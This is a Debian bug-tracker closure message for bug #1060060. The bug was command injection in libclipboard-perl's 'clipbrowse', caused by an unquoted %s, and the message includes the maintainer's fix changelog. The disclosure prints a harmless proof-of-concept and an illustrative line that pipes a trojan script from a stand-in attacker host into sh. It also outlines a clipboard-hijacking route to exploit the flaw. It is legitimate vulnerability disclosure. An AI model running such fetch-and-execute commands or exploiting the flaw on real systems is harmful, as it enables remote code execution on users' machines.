Your message dated Sat, 06 Jan 2024 02:53:29 +0000
with message-id <e1rlwot-006gpx...@fasolo.debian.org>
and subject line Bug#1060060: fixed in libclipboard-perl 0.28-1
has caused the Debian Bug report #1060060,
regarding libclipboard-perl: 'clipbrowse' from Debian package libclipboard-perl
executing clipboard contents
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1060060: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1060060
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: libclipboard-perl
Version: 0.27-1
Severity: important
Dear Maintainer,
I was checking out the 'clipbrowse' command from the Debian package
libclipboard-perl, while at the same time I was making notes on installation
instructions for a different application, thereby having multiple lines in the
clipboard buffer, including a line in the format "curl ... | sh"
I ran the 'clipbrowse' command, not knowing the command usage exactly and
expecting both an error and syntax example.
* What was the outcome of this action?
It opened a browser with the URL on the clipboard in the foreground (expected),
and simultaneously starting the installation process for the application in the
now hidden terminal/console. (not expected).
* What outcome did you expect instead?
I did not expect the clipbrowse command to run clipboard contents in a shell.
Example: Copy the following 2 lines present into the clipboard, then run the
'clipbrowse' command:
https://www.example.com
echo echo p0wned | sh
This results in the browser opening the requested URL in the foreground, while
simultaneous running the specified command in the background.
Testen on Debian 12, Perl 5.36.0-7+deb12u1, libclipboard-perl 0.27-1
This example might just print 'p0wned', but because you are copying this piece
of text using a browser that understands JavaScript, and JavaScript can modify
the clipboard contents, I could just as well have you execute "curl
https://evilhacker.example.com/install_trojan.sh | sh" by changing the
clipboard contents on an OnClipboard-event.
This could be abused by including the 'clipbrowse' command as an instruction in
an online tutorial, while having modified the users clipboard contents using
JavaScript.
I've raised the issue at the authors GitHub page (
https://github.com/shlomif/Clipboard/issues/11 ), but only today I've noticed
that that the vulnerability might be with just the Debian package, not the
source package.
I believe the cause of this is by not enclosing a variable with doublequotes:
The original sourcecode (
https://github.com/shlomif/Clipboard/blob/master/scripts/clipbrowse ) has
doublequotes around the variable %s
my $browser = $ENV{BROWSER} || 'chromium-browser "%s"';
And performs some string sanitizing in other lines.
The Debian version does not have these quotes, making the string sanitizing
ineffective:
'/usr/bin/clipbrowse' contains the following line:
my $browser = $ENV{BROWSER} || 'sensible-browser %s';
I have not checked if other packages that have been changed to use sensible-
browser have the same issue.
-- System Information:
Debian Release: 12.4
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500,
'unstable'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 6.1.0-14-amd64 (SMP w/4 CPU threads; PREEMPT)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE,
TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8),
LANGUAGE=en_US:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages libclipboard-perl depends on:
ii perl 5.36.0-7+deb12u1
ii xclip 0.13-2
Versions of packages libclipboard-perl recommends:
ii libcgi-pm-perl 4.55-1
ii liburi-perl 5.17-1
ii sensible-utils 0.0.17+nmu1
libclipboard-perl suggests no packages.
-- no debconf information
--- End Message ---
--- Begin Message ---
Source: libclipboard-perl
Source-Version: 0.28-1
Done: Florian Schlichting <f...@debian.org>
We believe that the bug you reported is fixed in the latest version of
libclipboard-perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1060...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Florian Schlichting <f...@debian.org> (supplier of updated libclipboard-perl
package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sat, 06 Jan 2024 00:02:46 +0100
Source: libclipboard-perl
Architecture: source
Version: 0.28-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Perl Group <pkg-perl-maintain...@lists.alioth.debian.org>
Changed-By: Florian Schlichting <f...@debian.org>
Closes: 1060060
Changes:
libclipboard-perl (0.28-1) unstable; urgency=medium
.
* Team upload
.
[ gregor herrmann ]
* Import upstream version 0.28.
.
[ Jenkins ]
* Update standards version to 4.6.0, no changes needed.
.
[ Florian Schlichting ]
* sensible.patch: quote clipboard contents (closes: #1060060)
* Declare compliance with Debian Policy 4.6.2
Checksums-Sha1:
f185c65aa90b19e996ad99768f48c1adff43f232 2216 libclipboard-perl_0.28-1.dsc
c9b13bfa6555d43aa050516050c9ec6585dfdb25 26673
libclipboard-perl_0.28.orig.tar.gz
e4de6253105a0450be36b7480d3926aa526750b3 3372
libclipboard-perl_0.28-1.debian.tar.xz
8a87e6322205fb9819a4e2ab5b25966469714ce5 8192
libclipboard-perl_0.28-1_amd64.buildinfo
Checksums-Sha256:
ea232c7868d41d2475ab92211793fa61b3d206b36333ee9185e21d8f027c7254 2216
libclipboard-perl_0.28-1.dsc
9e8d79015194263357c25a0f5d094800fff43bdbf9f8601ec3b0ed5eb0966d26 26673
libclipboard-perl_0.28.orig.tar.gz
f77565d0980848235185044622d6ae210ee8b7e2435fed7d555cb2cc25ab2417 3372
libclipboard-perl_0.28-1.debian.tar.xz
e984711b455dc6db840fcf63a8e3755a3c47a7ea4c3d236af61a3ad6b05da2ea 8192
libclipboard-perl_0.28-1_amd64.buildinfo
Files:
96a721eca67b7805303d9bfe64ef7c7d 2216 perl optional
libclipboard-perl_0.28-1.dsc
fcd645045894ebac18e1aec630d2a489 26673 perl optional
libclipboard-perl_0.28.orig.tar.gz
c2d8578f4442decb818220b68ca74452 3372 perl optional
libclipboard-perl_0.28-1.debian.tar.xz
25dcb28afc5c35edcc96ed81993e7196 8192 perl optional
libclipboard-perl_0.28-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEMLI8i05qOwnqprZSEpc7bnLcB7UFAmWYi1UACgkQEpc7bnLc
B7Xibw/+P0/n88T7w45cKuG0yyrFKPhAN3Dmt0B29vnNV4P758uJm72Atgm4sKZ2
9VOmDMt+oXJL836fP9G21pz1L6sIa5lY3hwk96QzVFuaiEk7rrVRrfHLEXkIg3S8
qkt80ESDkK2YjsLdI55RMqUks/P+cfqQ+mMExHnASF2Q/bOAi+vSKqKzRYGbu9Qp
9hMwzqTbFth6xeDbfdH3taocYlVaOQDBo8lZJxw1s5XRBQsrJfngZKV3PHtpE24t
F+zWyULfJQme+IJI+lh5cKoHdg/AiDfjbka8/e7o4HNnXgs9X9h+20ZNMBDyOuBp
/QE41ZkMbPCPzR0O77iqW+DNrqJmazlEhC9byVYRYUTl+9rDSpB06+bvgH04Lufz
UQ3Kdbtq94d5SEq8McTS8+T8Zvy41kXRuwQ7pDk+w3C6kz26NDOvEM8FdJ2GFpT4
r7JWj1x49UOwcdvmywhyo3nkchpuFHyBbtebxEXZis64fAsb7sof7m+AQc4bT1M6
ptjnQ/TR3Hx+LBEoVeZvNjLjtrvqyy49sqhDAdGqSYOVyKiCTfRMFhovLelmSlnO
cc70OaNXpbSh6NF1Ofy/SNwgLw+XrTrHUL7CrqRUTvT9cFYNB74Zo2yoBYS0rJ1Y
4otnkAWhtXasbSxWTbMzeOuVG5Tz8IcNiA4kSAZ+E2wTLjj3oiM=
=Zzjj
-----END PGP SIGNATURE-----
--- End Message ---
